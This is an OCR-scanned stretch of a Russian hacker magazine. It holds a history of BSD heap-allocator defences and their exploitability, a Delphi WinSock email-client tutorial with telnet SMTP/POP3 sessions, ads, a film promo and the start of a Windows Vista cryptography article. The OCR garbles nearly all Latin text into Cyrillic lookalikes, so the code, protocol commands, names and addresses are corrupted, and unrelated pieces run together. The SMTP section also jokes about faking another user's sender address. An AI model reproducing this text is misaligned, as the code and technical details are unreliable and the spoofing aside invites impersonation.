именуемый СаІІесЬ-аллокатором. 

В сентябре 1995 года СаІІесЬ был заменен намного более продвинутым 
рбк-аллокатором, который и стал основным для хВ5В-систем на последую- 
щую пару десятков лет. Выпущенный подлицензией ТЬе Ьеег-ѵѵаге Іісепзе 
(«Бесплатно, как пиво»), он находитсебе применение и по сей день. 
Начиная с октября 1 995 года, в рбк-аллокаторе появились опции іего и 
щпк, позволяющие диагностировать некоторые виды переполнения кучи. 
Впрочем, вто время кучу в хВ50-системах переполнять еще никто не соби- 
рался, и потому эти улучшения остались незамеченными. 

В декабре 1995 года произошел ряд радикальных изменений, направ- 
ленных главным образом на усиление производительности и повышение 
эффективности использования памяти. Побочный эффект — изменение 
служебных структур кучи — привел ктому, что все существующие Ьеар 
зтазбеб эксплойты мгновенно перестали работать, однако, по официаль- 
ным данным, ни одной рабочей реализации, атакующей кучу, на тот момент 
еще не существовало. 

Затем последовала череда многочисленных мелких изменений, за 
которой незаметно прошел 2001 год, отмеченный появлением эксплойтов 



под І_іпих, затем 2003 год, открывший эру атак на кучу хВЗБ. Закончился 

2005 год, к концу которого хакеры справились с новыми версиями діібс, а 
разработчики РгееВБй все никак не реагировали на ситуацию и от атак не 
защищались, перекладывая эту заботу на плечи компилятора (учитывая, 
что большинство программ не использует кучу напрямую, а работает через 
діібс, позицию создателей РгееВБй можно понять]. 

Наконец, в январе 2006 года древний рбк-аллокатор был отправлен 
на свалку истории и на его место пришел новый, улучшенный іазопе- 
аллокатор, созданный программистом по имени Оазоп Еѵапз. Функции 
таІІосО, саІІосО, розіх_тетаІідп(), геаІІосО и 1гее() были полностью 
переписаны с учетом требований защиты и масштабируемости. Ну, 
последнее нас сейчас не волнует, так что сразу перейдем к защите: в 
Іазопе-аллокаторе появились сторожевые «красные зоны» (гесіюпез), 
располагающиеся до и после всех блоков памяти, а также проверки на 
переполнение буферов, существенно затрудняющие атаку. Но... в марте 

2006 года красные зоны были удалены по соображениям производи- 
тельности, а в СѴЗ-дереве появился следующий комментарий: «Уда- 
лены красные зоны, поскольку переполнение буферов ничуть не более 
вероятно, чем разрушение внутренних структур динамической памяти», 
из чего надо полагать, что ни буферы, ни внутренние структуры не были 
защищены. Правда, в силу своей новизны іазопе-аллокатор оказался 
достаточно стойким, и эксплойты, ориентированные на рИк-аллокатор, с 
ним обломались, но! Базовые принципы атаки не изменились, итребо- 
валась всего лишь адаптация эксплойтов под новые структуры данных. 
На момент написания этих строк РгееВЗй продолжает использовать 
незащищенный іазопе-аллокатор, представляющий собой легкую 
мишень для атаки. 

г ЫЕТВ5Р 

Операционная система ЫеіВБО, отбранченная от РгееВБй, во многом 
повторила ее путь. Сначала в ней использовался СаІІесЬ-аллокатор, но в 
июне 1999 года он был заменен рЬк-аллокатором, позаимствованным из 
РгееВБй. Изменения внутренних структур данных динамической памяти 
были несущественными, и потому обе системы оказались совместимыми с 
точки зрения эксплойтов. 

Очередная серия изменений произошла в мае 2001 года, когда работ- 
ники ЫеіВБО перетащили новую версию рЬк-аллокатора из РгееВБй, 
слегка адаптировав ее в соответствии со своей философией и добавив 
ряд мелких проверок на переполнение кучи, которые, в общем-то, ока- 
зались совершенно несущественными с хакерской точки зрения. 
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Схематичное строение кучи в ВЭй-системах 



В настоящий момент ЫеШСй продолжает использовать незащищенный 
рЬк-аллокатор. Рандомизация адресного пространства реализована 
только в стеке и секциях кода/данных, но куча остается нерандомизован- 
ной. Сторожевые страницы также отсутствуют, как отсутствует о б фу ска - 
ция указателей, а потому Ые{В50 легко атакуется древними эксплойтами. 
Впрочем, чтобы захватить управление, хакеру необходимо преодолеть 
защитный механизм РаХ, интегрированный в ЫеШЗО, подробнее о кото- 
ром можно прочитать в моей статье «Переполнение буфера на системах 
с неисполняемым стеком» (смотри пегиті.ога.ги/гд-пх.ипсепзогесі. 
гір ]. но это тема совсем другого разговора, не имеющего к куче никакого 
отношения. 

^ 0РЕЫВ50 

Охужэта драконическая ОрепБЭЭ! Самаятрудная мишеньдля атаки! Мож- 
но даже сказать, практически неприступная, но именно это и возбуждает 
хакеров, заставляя их искать весьма нетривиальные пути. Чтобы развеять 
миф о неприступности ОрепБЭБ, достаточно вспомнить Веп’а Наѵѵкез’а, 
атаковавшего кучу ОрепВЭО в 2006 году, то есть когда в ней уже были реали- 
зованы основные защитные механизмы, отсутствующие у конкурентов, но 
не будем забегать вперед и вернемся в далекий 1 995 год, когда в ОрепБЭй 
использовался СаКесЬ-аллокатор со всеми дырами, что в нем были. 

В августе 1996 года разработчики ОрепБЭй позаимствовали рЬк-аллокатор 
из РгееВЗО без каких бы то ни было существенных переделок, что позволило 
хакерам атаковать ОрепБЭй стой же легкостью, что и остальные системы. 

В октябре 2003 года (то есть спустя полгода после открытия сезона атак на 
кучухакером ВВР) коллектив ОрепВЭО первым отреагировал на эту угрозу, 
выпустив усиленную версию рбк-аллокатора, добавив в него сторожевые 
страницы и рандомизацию кучи. Это вызвало бурю восторга среди «трудя- 
щихся», которые вовсю использовали новый аллокатор на продакшн-ма- 
шинах, считая себя абсолютно неуязвимыми. 

Тем временем коллектив ОрепБЭй, вместо того чтобы почивать на 
лаврах, не отходил от клавиатур и ковал новое секретное оружие, которое 
было представлено народу в августе 2004 года. Появилась обфускация 
указателей, а рандомизация кучи была существенно усилена и теперь 
затрагивала нетолько адреса блоков памяти, но и местоположение 
служебных структур, что делало кучу полностью непредсказуемой и 
очень-очень сложно атакуемой. Однако в июне 2005 года по многочис- 
ленным просьбам «трудящихся» обфускация указателей была отправле- 
на в отставку, поскольку оказалась чересчур тяжеловесной и негативно 
влияющей на производительность. 



«Наш ответ Чемберлену» — вот девиз аллокатора, выпущенного в 
2006 году и устраняющего ряд слабостей реализации, продемонстри- 
рованных на презентации Ехріоіііпд ОрепВБй. Говоря техническим 
языком, для структур рд і пГо и рдГгее был создан специальный алло- 
катор, который размещал их в отдельной области памяти (прежние 
версии аллокатора использовали для этих целей функцию і та Нос) . 
Чанки (сбипкз) переместились в специальный массив, размещаемый 
в случайном месте адресного пространства, в результате чего затереть 
служебные данные кучи в последних версиях ОрепВБО практически 
невозможно, но создать подложный чанк и скормить его функции Ігее() 
получится без проблем! Ведь обфускация указателей по умолчанию от- 
ключена. Однако найти уязвимый указатель, пригодный для затирания, 
удается далеко не всегда, так что ОрепВЭО по праву носитзвание самой 
защищенной операционной системы (только не надо путать «самую 
защищенную» с «защищенной вообще»). 

г ЗАКЛЮЧЕНИЕ 

Вот мы и пробежались галопом по всем аллокаторам, которыетолько 
есть, рассмотрев их сильные и слабые стороны. И что же мы в итоге 
обнаружили? РгееВЭО атаковать ничуть не сложнее, чем ІЧеіВЭО, однако 
из-за различных типов применяемых в них аллокаторов эксплойты 
получаются несовместимыми. ОрепВЭО — единственная система, 
существенно затрудняющая атаки на кучу, но... вовсе не делающая их 
принципиально невозможными! т 



Что такое 
аллокатор? 

Аллокатором (от английского ш аІІосаГе — «размещать», «выделять») 
называется совокупность механизмов, ответственная за распреде- 
ление памяти и реализующая операции выделения, освобождения 
и (опционально) изменения размеров ранее выделенных блоков. 
Существует три типа аллокаторов: автоматические (работающие со 
стеком), статические (работающие с секцией данных) и динамичес- 
кие (работающие с кучей) . Если явно не оговорено обратное, то под 
аллокатором подразумевается именно динамический аллокатор. 
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ПРАВИЛЬНЫМ 



ЕМАІЬ-КЛИЕНТ 



УЧИМСЯ РАБОТАТЬ С ЭЛЕКТРИЧЕСКОМ ПОЧТОЙ БЕЗ 



ИСПОЛЬЗОВАНИЯ ПЛОДОВ ЧУЖОГО ТРУДА 



Етаіі-клиент — программа, которой мы пользуемся регу- 
лярно. Количество «мыльниц», предлагаемых разработ- 
чиками, растет не по дням, а по часам. Выбор велик, но 
зачастую все эти многофункциональные монстры снабже- 
ны теми фишками, которые среднестатистическому поль- 
зователю могут вообще никогда не потребоваться, но за 
которые все же приходится платить. Что, тебя тоже не ус- 
траивает эта ситуация? Тогда мы покажем тебе, как напи- 
сать свой собственный етаіі-клиент, который будет уметь 
отправлять и принимать почту и тем самым, возможно, 
поможет тебе не только сэкономить бабло, но и заработать. 
Мы понимаем, что закодить такую программку, используя 
компоненты, как-то не по-хакерски, поэтому мы усложним 
задачу и рассмотрим почтовик на ѴѴіпЗоск АРІ. Получен- 
ные знания пригодятся тебе при создании как почтовиков, 
так и других полезных взломщику сетевых тулз. 



83 РАЗБИРАЕМСЯ С ПРОТОКОЛАМИ 

Прежде чем приступить к практике и терзанию клавиатуры, давай разбе- 
ремся стеорией приема и передачи почтовых сообщений. Ты наверняка 
знаешь (а если не знаешь, то стыд тебе и позор), что для передачи элек- 
тронных писем существует старый проверенный протокол 5МТР (Зітріе 
МаіІТгапБІ'ег Ргоіюсоі— простой протокол передачи электронной почты), а 
для приема наибольшей популярностью пользуется РОРЗ. Спецификация 
этих протоколов описана в РРС 2821 и РРС 1225. Я рекомендую тебе сразу 
же скачать эти доки, поскольку в них описано много интересных вещей, о 
которых в силу небольшого объема статьи я рассказать не смогу. 



Н 5МТР 

Послетого какты в своем почтовом клиенте состряпал письмо и нажал 
кнопочку «Отправить», твоя «мыльница» соединяется суказанным 
в настройках ЗМТР-сервером для передачи специальных команд, 
посредством которых и будет отправлено твое сообщение. Давай 
рассмотрим этотпроцесс на примере ручной отправки письма. За 
конвертом и марками можешь не бежать, все, что нам потребуется для 
этого, — Іеіпеі.ехе, который входит в поставку ѴѴіпсІоѵѵз. Запускай стб. 
ехе и набирай команду «Іеіпеі уоиг зтір вегѵег порт». Порт 5МТР-сер- 
вера по умолчанию 25, но некоторые админы его изменяют. У меня есть 
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почтовый ящик в домене іпЬох.ги, поэтому я вводил «Іеіпеі згтйр.іпЬох. 
ги 25». После установки соединения с удаленным сервером мы получим 
приветствие. Сервер сказал нам «Здорова», а значит, нам необходимо 
проявить вежливость и ответить тем же. Для этого отправь команду 
«НЕ1_0 ИмяСвоегоКомпа»: 

НЕБО 5РІБЕК 

В случаеуспешного выполнения команды сервер вернетнам код 250, что 
будет означать, что «все тип-топ», можно продолжать дальше. Сообщим 
серверу отправителя письма: 

МАІЬ ГРОМ: <зрі(іег_пеР@іпЪох. ги> 

В ответ на это мы снова получим сообщение с кодом 250, свидетельст- 
вующее об успешном выполнении команды. Обрати внимание, что в МАІІ_ 
РВОМ нужно указывать свой ящикна этом сервере, обычно он выступает 
гарантом того, что ты свой человек, а не мерзкий спамер, которому не раз- 
решается пользоваться сервером. Хотя тебе ничто не мешаетуказать ящик 
другого пользователя на этом же сервере :). 

Ниже я приведу остальную часть «диалога» с 5МТР-сервером, снабдив все 
это дело необходимыми комментариями. Символ «>» в начале строчки ука- 
зывает на то, что эту команду посылает клиент, а символом «<» помечаются 
ответы сервера. 

> К.СРТ ТО : <апЬопоѵ. ідог . кЪ.ѵ@дтаі1 . сот> //Получатель/по- 
лучатели сообщения 



ЧАВО при использо- 
вании ѴѵіпЗоск АРІ 

(^: Я запустил исходник примера, заполнил настройки, нажал «Отпра- 
вить», и программа стала подвисать. Почему? 

А: При использовании ѴѴіпЗоск АРІ при вызове какой-либо функции 
возникает «застывание» окна приложения. Для решения этой пробле- 
мы можно вынести код с обращением к ѴѴіпЗоскАРІ в отдельный поток 
или использовать для получения данных сокетов событийную модель 
ѴѴіпсІоѵѵз. 

: Я набрал весь код из журнала, но моя программа не хочет компили- 
роваться, ругается на на использование неизвестных функций. В чем 
проблема? 

А: Скорей всего, ты забыл добавить в изез ссылку на модуль ѵѵіпзоск с 
описанием сетевых функций. 

: Модуль подключил, помогло частично, но на вызове некоторых функ- 
ций все равно возникает ошибка: «Неизвестная функция». 

А: Вероятнее всего, ты подключил старый модуль. Тот модуль, который 
идет в поставке с ОеІрЫ, содержит описание функций лишь первой 
версии. Чтобы получить возможность заюзать новые функции, нужно 
скачать заголовочный файл. Найти его можно на нашем диске. 



< 250 АссерСеб 

> БАТА / /После этой команды отправляется заголовок и тело 
письма 

//Сервер разрешает нам ввод текста нашего сообщения. По 
завершению набора нужно отправить символ точки на новой 
строке . 

< 354 Епбег теззаде. Епбіпд ткЪ. " . " оп а Ііпе Ъу ібзеіб 

> Егош: <зрібег_пеб@іпЬох . щ> //От кого 

>То: <апбопоѵ. ідог . кЬ.ѵ@дтаі1 . сот> //Кому 

//Кодировка письма 

> Міте-Ѵегзіоп: 1.0 

> СопбепС-Туре : Сехб/ріаіп; сЬагзеб= "ѵ7Іпскжз-12 51 " 
//Текст сообщения 

> Это текст сообщения 

//Даем понять серверу, что наше сообщение сформировано 

> . 

< 250 ОК іа. = ІЬКбЗЗккЗЗ 
//Завершаем соединение с сервером 

> <2ТЛТ 

< 221 згпкр . іпЬох . ги сіозіпд соппескіоп 

Воттаким образом ТЬеВаі! и прочие ОиНоок’и передаютнашу корреспон- 
денцию. Вроде бы ничего сложного, а некоторые программисты на этом 
неплохо зарабатывают. 

г рорз 

Общение клиента с РОРЗ-сервером схоже с 5МТР. В этом прото коле также 
определен набор команд, посредством которого и происходит обмен 
информацией. Для лучшего понимания опятьже приведу примертипичной 
сессии соединения через Теіпеі: с РОРЗ-сервером моего провайдера. 

//Соединение с РОРЗ-сервером установлено 
<+ОК 

//Отправляем свой логин 

> ІІ5ЕК зрібег_пеб@іпЪох. ги 

//Все пучком, такой пользователь есть 
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оосМпд 






Логи нужно... обязательно нужны ;) 



Лицо БМТР-клиента 




Получатель почты собственной персоной! 



< +ОК Раззѵгогсі гедиігесі бог изег зрісіег_пеб@іпЪох. ги 

//Говорим свой пароль 

> РАЗ 8 1234 

//Залогинились успешно, в ящике семь писем 

< +0К зріс!ег_пеб@іпЬох. ги таіісігор Лаз 7 шеззадез 

(45056 осбебз) 

//Запрашиваем список писем 

> ЫЗТ 

//Всего семь писем общим размером 45056 

< +ОК 7 шеззадез (45056) 

//Далее идет список писем в формате: «номер_письма» 
«размер» 

< 1 2204 

< 2 2304 



//Запрашиваем письмо с идентификатором 1 

> КЕТЕ 1 

//Текст письма 

//Помечаем на удаление письмо с идентификатором 1 

> БЕЬЕ 1 

< +ОК шеззаде 1 сіеіебесі 

//Нет, лучше вернем его обратно. Снятие пометки удаления 

> КЗЕТ 

< +ОК таіісігор Лаз 7 шеззадез 



Коды ответов 
ЗМТР-сервера 

Ты заметил, что почти на каждую нашу команду сервер отвечает соот- 
ветствующим цифровым кодом? Благодаря этим ответам мы можем 
анализировать происходящую ситуацию. Например, если мы отправим 
некорректную команду, то сервер вернет нам код 500, который озна- 
чает «ітгесо^пігесі соттапсі» («команда не распознана») . Чтобы все 
письма передавались без сучка и задоринки, в программе-клиенте надо 
реализовать проверку возвращаемых сервером команд, а для этого, в 
свою очередь, необходимо знать их значения. Все возможные коды (на 
основании КРС 2821) я привел в соответствующей табличке. 



//Закрываем соединение с РОРЗ -сервером 
< ОТЛТ 

> ОК РОРЗ зегѵег а б іпЬох.ги зідпіпд об б 

В отличие отБМТР, в протоколе РОРЗ не реализованы коды ошибок, вместо 
них предусмотрены служебные +0К (команда успешно выполнилась) и 
-ЕРР (описание ошибки). 

Обрати внимание на команду 0Е1_Е. После ее выполнения физическое 
удаление письма не произойдет до тех пор, пока РОРЗ-сервер не перейдет 
в состояние ІІРОАТЕ. Переход в это состояние начинается после отправки 
команды 01ІІТ. До начала стадии ОРОАТЕты в любое время имеешь полное 
право отказаться отудаления выбранного письма, точнее, снять пометку на 
удаление с письма. 

0 ВЕЗДЕСУЩИЙ ѴѴІЫ50СКАРІ 

Выше мы с тобой договорились, что для решения поставленной зада- 
чи мы не станем пользоваться готовыми компонентами, а реализуем 
все по-мужски — с использованием лишь функций, предоставлен- 
ных сетевой моделью ѴѴіпсІоѵѵз. Хорошо разобравшись с функциями, 
входящими в ѴѴіпБоск АРІ, ты сможешь написать любое сетевое 
приложение. Кроме того, используя функции лишь из первой версии 
сетевой библиотеки, ты имеешь возможность портировать прило- 
жения в никс-системы. Итак, давай разберем функции, которые нам 
потребуются. 

бипсбіоп б/ЗАЗбагбир (ѵА/егзіопКедиезбесі: ѵгогсі; ѵаг 
МЗАБаба:ТМ5АБаба) : іпбедег; збсісаіі; 

Это функция, с вызова которой нужно начинать программирование любого 
сетевого приложения. Она предназначена для инициализации сетевой 
библиотеки ѴѴіпсІоѵѵз. Функции нужно заслать два параметра: 

1 . ѵѵѴегзіопРериезіесІ — версия инициализируемой библиотеки. Их всего 
две — 1 .1 и 2.0. Например, для первой версии пишем такеѵѵогсИ 1 , 1 ). 

2. Указатель на структуру \Л/5А0аі:а. После выполнения функции в эту струк- 
туру запишется информация о сетевой библиотеке. 

Приуспешном выполнении функция вернетО. Для получения кодов ошибок 
в ѴѴіпБоск АРІ служит функция ѴѴБАбеібазіЕггогП. Ей не нужно передавать 
какие-либо параметры, после вызова она возвращает код последней 
возникшей ошибки при работе с сетевыми функциями. 

бипсбіоп зоскеб (абгіпбедег; буре : іпбедег ; ргобосоі : 
іпбедег) :Т8оскеб, збсісаіі; 

Перед тем как соединиться с удаленным узлом, нужно создать «розетку» 

— зоскеб Как раз за его создание и отвечает одноименная функция зоскеб 
Входных параметров здесьтри: 

І.аІ — семейство протоколов. Нам потребуется лишь ТСР, поэтому будем 
указы вать АР І N ЕТ. 

2.1уре — тип создаваемого сокета. Может быть зоск_5І:геат (для протокола 
ТСР/ІР) и зоск_сІдгат (ІЮР). 
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3. ргоіосоі — протокол. Для ТСР нужно указать 1РРР0Т0_ТСР. 

Результатом выполнения будет новый сокет. Создав сокет, можно пробовать 
подключиться. Для этого в библиотеке реализована функция Соппесб 

бипсбіоп Соппесб (ЗгТЗоскеб; ѵаг пате : ТЗоскАбсіг ; 
пашеіеп: іпбедег) : Іпбедег : збйсаіі ; 

Параметрами для функции служат: 

1.5 — зоскеі, созданный функцией воскеб 

2. пате — структура ЭоскАсІсіг, содержащая данные, необходимые для 
подключения (протокол, адресудаленного компьютера, порт). 

3. патеіеп — размер структуры типа ТЭоскАсІсІг. 

Успешно выполнившись, а значит, иустановив соединение, функция вер- 
нет 0 или ошибку, которую можно получить с помощью ѴѴ5А6е1:І_а5І:Еггог(). 
Структура ТБоскАсІсІг выглядиттак: 

ТЗоскАскЗгШ = зоскас!с1г_іп; 

ЗоскАсІсіг_іп = гесогб. 

зіп_баті1у: и_з1іогб; //Семейство протоколов 
зіп_рогб: и_зЬ.огС ; //Порт, с которым нужно будет уста- 
новить соединение 

зіп_ас1с1г: ТІпАскЗх; //Структура, в которой записана 
информация об адресе удаленного компьютера 

зіп_зего: аггау[0. .7] об СЪаг; //Совмещение по длине 
структуры зоскас!сІг_іп с зоскасМг и наоборот 
епсі; 

Чтение и отправка данныхудаленной стороне осуществляется с помощью 
функций вепс! и гесѵ. Они описаны следующим образом: 



ссіоп зепб. (з:ТЗоскеб, ѵаг Виб; Іеп: іпбедег ; біадз: 
іпбедег) : Іпбедег ; збйсаіі ; 

бипсбіоп гесѵ (з:ТЗоскеб, ѵаг Виб; Іеп: іпбедег ; біадз: 
іпбедег) : Іпбедег ; збйсаіі ; 

Параметры для этих функций одинаковы: 

1 . в — сокет, на который нужно отправить (или принять) данные. 

2. Ьиб — буфер с данными для отправки (приема). 

3. Іеп — размер передаваемых (принимаемых) данных. 

4. Падв — флаги, отвечающие за метод отправки (приема). 

Выполнившись, функция вернет фактическое количество отправленных/ 
принятых байт. 

бипсбіоп СІозеЗоскеб (з :ТЗоскеб) : іпбедег ; збсісаіі ; 

Эта функция служит для закрытия сокета, переданного в качестве одного- 
единственного параметра. 

^ ОТЛИВАЕМ МЫЛЬНИЦУ 

Вот мы стобой и добрались до самого интересного — до практической час- 
ти. Оттеорииуже плавится мозг, нужно срочно упорядочивать полученные 
знания. Не вопрос! Запускай ОеІрЫ, создавай новый проекти срисовывай 
мою форму. 

На форме у меня расположен компонент РадеСопІгоІ, благодаря которому 
созданы закладки. Первая закладка посвящена отправке писем, вторая 
— чтению, третья — настройкам (адреса 5МТР- и РОР-серверов и т.д.), в 
четвертой ведутся логи происходящего. Каждая закладка забита полями 
ввода (ТЕсМб), ТМето и т.д. 



Прикоснись у лучшему! 

Мыши и клавиатуры йе^епсіег 
Серия «Города Швейцарии» 
3 года гарантии 
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ОеГелс/ег 5 Вегп 790 

Проводная клавиатура 

19 горячих клавиш 
Колесо управления 
громкостью звука 
Встроенная подставка 
для рук 
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ОеГепс/ег 5 йаѵоз 775 

Беспроводной набор 

Мышь: 5 кнопок + колесо 40-прокрутки 
Клавиатура: 21 горячая клавиша, 
колесо управления громкостью звука, 
колесо прокрутки документов 
Радиус действия -8м 



Примите участие в нашей викторине и получите шанс выиграть один 
из беспроводных наборов серии. Розыгрыш призов - каждые две недели! 



Подробности смотрите на сайте 

ѵѵѵѵѵѵ.сІеГепсІег.ги/ргото/кѵѵіІгегІапсІ 



ЕсЫепсІег 

Удобство складывается из мелочей 
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Н ШКОДИНГ 

Какяуже говорил, первое, с чего необходимо начинать программирование 
любого сетевого приложения, — это инициализация сетевой библиотеки. 
Код, отвечающий за эту функцию, я повесил на событие ОпСгеаЫ) формы: 

і г МЗАЗЬагЬир (такеѵгогсі ( 1 ,1 ) , _мБаЬа) о 0 і ііеп 
Ьедіп 

ЗЬомМеззаде ( 'Ошибка при инициализации ѴЬтЗоск. Продол- 
жение невозможно ' ) ; 

Арріісабіоп . Тегтіпабе; 

епб; 

В коде я проверяю результат выполнения функции. Если он не равен 0, зна- 
чит возникла ошибка и нетсмысла продолжать работу программы, поэтому 
показываем сообщение и прерываем работу приложения. 

По нажатию кнопки «Отправить» на закладке «5МТР-клиент» напиши код 
из соответствующей врезки. 

Листинготправки письма получился довольно-таки большим. Рассмот- 
рим его внутренности. Первое, что я делаю, — это создаю новый сокет. 
Причем создаю сокет не функцией зоскеі, о которой рассказывал выше, 
а еще неизвестной тебе СгеаІеБоскеШ- Эту функцию я описал самостоя- 
тельно и реализовал в ней создание нового сокета и заполнение структуры 
ТЗоскАсІсІгІ N . Результатом выполнения функции будет новый сокет и запол- 
ненная структура _зегѵег_ас1сІг (объявлена в глобальных переменных]. 
Сокет создан, а это означает, что можно начинать попытки соединения с 
удаленным сервером. Вызываю функцию СоппесШ, сразуже проверяя 
результат ее выполнения. Если он равен значению константы 50СКЕТ_ 
ЕРРОР.тозначитвозникла ошибка и нужноузнать, какая именно. Для 
получения этой информации у меня определена процедура ЭоскеІзЕггогзО, 
а уже из этой процедуры происходитзанесение информации в лог. 



В случае успешного завершения работы функции я делаю небольшую 
задержку (в одну секунду]. Задержка нужна для того, чтобы сервер успел 
среагировать и отправить нам свой ответ. Полученный ответсохраняем 
в логе помощью процедуры АсІсІТоІ_од(], в которой в качестве параметра 
передаем результат выполнения функции НеасІРготБоскеШ — еще одной 
самописной функции, введение которой спасет код от большего числа 
одинаковых конструкций. Код функции РеасІЕготЭоскеШ ты можешь 
найти на 0\Ю. 

Вызвав функцию ВеасІРготВоскеІ:, мы прочитали первую порцию данных 
отБМТР-сервера. Ты внимательно изучил теорию и теперь знаешь, что са- 
мыми первыми данными, которые отправляетудаленный сервер, является 
приветствие. Получив его, можно начинать «диалог» с БМТР-сервером. Все 
остальное, что происходите коде, тебе должно быть уже знакомо по рассмот- 
ренному нами выше примеру сессии общения сБМТР-сервером. Давай луч- 
ше поглядим поближе на РеасІРготБоскеШ — процедуру, через которую мы 
получаем все данные, пришедшие нам отсервера. В самом начале процеду- 
ры я очищаю переменную, в которую буду принимать данные отсервера. Для 
этого я полностью забиваю ее нулями. Затем я вызываю функцию приема 
данных гесѵ(). О входных параметрах для этой функции я уже рассказывал, 
поэтому сейчас мы их пропустим. Приняв данные, можно начать ими распо- 
ряжаться. Я подготавливаю их к форматированию и последующему выводу 
на экран пользователя. Под форматированием я подразумеваю нормальный 
построчный вывод полученных данных в компонент Мето. Для отправки 
данных серверу я создал функцию — БепсіТоБоскеЬ В качестве параметров 
ей нужно передать лишь сокет и данные, которые будут отправлены. Весь 
остальной код, отвечающий за подключение к РОРЗ-серверу, я приводить 
не буду, постольку он полностью аналогичен коду на врезке, за исключением 
лишь самих команд, посылаемых серверу. Ты же всегда можешь посмотреть 
прокомментированный исходник на нашем диске. На этом я хочу откланять- 
ся и пожелать тебе удач и в нелегком коде р с ком труде, ц-ц 



Код по нажатию 
кнопки «Отправить» 

ѵаг 

_ЗоскеЬ : ТЗоскеС ; 

_5бг : збгіпд; 

1 , 11 : іпбедег ; 

Ьедіп 

РадеСопбгоІІ . АскіѵеРадеІпсіех: =3 ; 

АбсІТоЬод ( ' Подготовка сокета ' ) ; 

//Создаем сокет для подлючения к зтЬр серверу 
_ЗоскеЬ := СгеаЬеЗоскеЬ (зтЬрЗегѵегЕсІіЬ .ТехЬ , 
ЗЬгТоІпЬ ( ЗтбрРогЬЕсІіЬ . ТехЬ ) ) ; 

//Пробуем подсоединиться к ЗМТР-серверу 
іі (Соппесб (_ЗоскеЬ , _зегѵег_аскіг , 
зізеОі (_зегѵег_аббг) ) = ЗОСКЕТ_ЕКЖЖ) ДЬеп 
Ьедіп 

ЗоскебзЕггогз ( ) ; 

Ехіб; 

епЬ; 

зіеер ( 1000 ) ; 

//Прочитаем приветствие сервера 
АскіТоЬод (КеабРготЗоскеЬ (_Зоскеб) ) ; 

ЗепсЗТоЗоскеЬ (_зоскек , 'НЕЬО ' + СеЬЬосаІНозб) ; 
зіеер ( 100 ) ; 

АскіТоЬод (КеабРготЗоскеЬ (_ЗоскеЬ) ) ; 

ЗепсіТоЗоскеЬ (_зоскеб , ’МАІЬРКОМгс' + 

РготЕсііЬ . Техб+ ' > ' ) ; 
зіеер ( 100 ) ; 

АсісіТоЬод (КеасЗРготЗоскеЬ (_зоскеЬ) ) ; 

ЗешіТоЗоскеб (_зоскеб , 'КСРТТОгс' + ТоЕбіС . ТехЬ+ ' > ' ) 
зіеер ( 100 ) ; 

АскіТоЬод (КеасЗЕготЗоскеЬ (_зоскеб) ) ; 



//Заполняем заголовок письма 
ЗепЬТоЗоскеЬ (_зоскек , ' БАТА 1 ) ; 
зіеер ( 100 ) ; 

АскіТоЬод (КеасЗРготЗоскеЬ (_зоскеб) ) ; 

//От кого 

ЗепбТоЗоскеС (_зоскеб , ' Егош: < ' +ЕгошЕ(ііЬ . ТехЬ+ ' > ' ) ; 

//Кому 

ЗепбТоЗоскеС (_зоскеб , ' То : < ' +ТоЕсііб . ТехС+ ' > ' ) ; 
//Тема письма 

ЗепсЗТоЗоскеЬ (_зоскек , 'ЗиЬзесЬ: ' +ЗиЬз есЬЕсШ: . Техб) ; 
ЗепЬТоЗоскеЬ (_зоскек , 'Міше-Ѵегзіоп: 1 . 0 ' +#13+#10+ 

' СопЬепЬ-Туре : Ьехб/ріаіп; сЬагзек :::: "міпсіо^з-12 51" ' ) ; 
/ /Программа-отправитель 

ЗепсЗТоЗоскеЬ (_зоскек , 'Х-Маііег: МуМаіІРгодгаш' ) ; 
//Текст письма 

Гог I : = 0 Со ТехЬМешо . Ьіпез . СоипС-1 Ьо 

Ьедіп 

_збг : =ТехЬМето . Ьіпез . ЗЬгіпдз [ і ] ; 

_зЬг<> ' ' сіо 

Ьедіп 

^ : =ЗепсіТо8оскеЬ (_зоскеб , _збг) ; 
іі ^ =ЗОСКЕТ_ЕККОК ЬЬеп 
Ьгеак; 

Беіеке (_збг , 1, з ) ; 

епсі; 

епб; 

зепбТоЗоскеС (_зоскек , #13 + #10+ 

АскіТоЬод (КеабРготЗоскеЬ (_зоскеб) ) ; 
зепбТоЗоскеС (_зоскеб , ' <21ЛТ ' ) ; 

АскіТоЬод (КеабРготЗоскеЬ (_зоскеб) ) ; 

СІозеЗоскеЬ (_зоскеб) ; 
епб; 
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КРИСТИАН ЖОЗИАН 

КЛАВЬЕ БАЛАСКО 
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РЕЖИССЕРА «ТАКСИ 2, Д 4» 

ЖЕРАРА КРАВЧИКА 
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МИРОВАЯ ПРЕМЬЕРА 

5 ДЕКАБРЯ 












Николай байбородин^^И 


| / ВАІВОПСШІЫ@СМАІІ..СОМ \ 



Ну что же, разопьем по бутылочке темного пива и продолжим знакомиться с возможно- 
стями ѴѴІпсІошз ѴізГа, доступными разработчикам программного обеспечения (или, как 
подсказывает Крыс Касперски из своей глубокой норы в недрах аргентинского болота, 
«точить»). На этот раз давай посмотрим, что же изменилось в операционной системе с 
точки зрения шифрования данных. А изменилось, надо сказать, немало: начиная с осно- 
вательного обновления СгурСоАРІ и заканчивая созданием принципиально новой сущно- 
сти — криптоядра С1МС (СгурІо^гарЬу АРІ ИехС Сепегаііоп). Дело за малым — разобраться 
со всем этим богатством и научиться применять криптотехнологии ѴѴѴ на практике. 



г ѴѴШР0ѴѴ5СКѴРТ0 — ВРЕМЯ ПЕРЕМЕН 

Ааіоба, биу! Думаешь, ты уже изучил Висту вдоль и поперек и познакомился 
со всеми ее фишками? Не тут-то было. Пора копнуть глубже и заглянуть ей 
под капот. Видишь во-о-он ту блестящую штуковину с моторчиком? Нравит- 
ся? Азнаешь, что это такое? Нет? Нутогда слушай и запоминай. 

Итак, на повестке дня — криптосистема ѴѴіпсІоѵѵз Ѵізіа. 

Если тебе приходилось использовать криптографические возможности 
более ранних версий Винды, ты должен знать, что доступ к этим воз- 
можностям предоставляется системой САРІ (Сгуріо АРІ). Так вот Ѵізіа 
несет на своем борту новую, не стольубогую, как в ѴѴіпсІоѵѵз ХР, версию 



САРІ. Но как это дело не причесывай, конфетку из него все равно не 
сделаешь. И в МісгозоЛ это хорошо понимают. Нет, они не переписали 
САРІ с нуля (на фига напрягаться), они просто засунули САРІ в дальний 
темный угол системы. Теперь за взаимодействие с САРІ отвечает кра- 
сивая блестящая обертка под названием СІЧ6. Но парни действитель- 
но старались, и обертка получилась не только красивой, ной весьма 
полезной. Отом, какие возможности перед тобой открывает система 
СЫ6, читай ниже. 

